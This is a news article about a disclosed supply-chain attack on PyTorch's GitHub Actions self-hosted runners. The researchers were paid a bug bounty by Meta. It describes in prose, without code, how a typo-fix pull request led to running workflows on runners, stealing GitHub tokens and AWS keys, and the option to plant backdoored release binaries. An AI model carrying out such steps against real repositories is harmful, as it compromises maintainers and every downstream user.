Security engineer John Stawinski IV has written up a project in which he and Adnan Khan carried out a supply-chain attack on the popular PyTorch deep learning framework infrastructure — though with benign intentions, luckily.
"Security tends to lag behind adoption, and AI/ML is no exception," Stawinski writes by way of introduction to the project. "Four months ago, Adnan Khan and I exploited a critical CI/CD [Continuous Integration/Continuous Delivery] vulnerability in PyTorch, one of the world’s leading ML [Machine Learning] platforms. Used by titans like Google, Meta, Boeing, and Lockheed Martin, PyTorch is a major target for hackers and nation-states alike. Thankfully, we exploited this vulnerability before the bad guys."
The attack in question takes place over Microsoft's GitHub code hosting and collaboration platform, taking advantage of GitHub Actions — a system for automating compilation, testing, and even the release of software, and which allows for the execution of user-supplied code during that process. This code can either be part of GitHub's hosted platform, or what is known as a "self-hosted runner" — which brings with it warnings about security all-too-often ignored by developers, Stawinski says.
"It doesn’t help that some of GitHub's default settings are less than secure," Stawinski notes. "By default, when a self-hosted runner is attached to a repository, any of that repository's workflows can use that runner. This setting also applies to workflows from fork pull requests. Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR."
Analysing the PyTorch repository using Praetorian's Gata tool, Stawinski and Khan found several potentially-vulnerable self-hosted runners — and ones with access to secrets including Amazon Web Services (AWS) access keys and GitHub Personal Access Tokens (PATs). By submitting a simple pull request to fix a typo in documentation, the pair became "contributors" — and crafted a workflow which gave them full access to the runners, which were then used to snatch the supposedly-protected secrets including the GitHub PATs.
"Using the [GitHub] token," Stawinski explains, "we could upload an asset claiming to be a pre-compiled, ready-to-use PyTorch binary and add a release note with instructions to run and download the binary. Any users that downloaded the binary would then be running our code. If the current source code assets were not pinned to the release commit, the attacker could overwrite those assets directly.
"If backdooring PyTorch repository releases sounds fun, well, that is only a fraction of the impact we achieved when we looked at repository secrets." These secrets, Stawinski notes, unlocked access to more than 90 other PyTorch repositories as well as the project's Amazon Web Services (AWS) cloud systems.
"Overall, the PyTorch submission process was blah, to use a technical term. They frequently had long response times, and their fixes were questionable," Stawinski says of the process, which — eventually — netted the pair a $5,000 bug bounty payout from Facebook parent Meta, plus a ten per cent bonus as an apology over the delays.
Stawinski's full write-up is available on his website.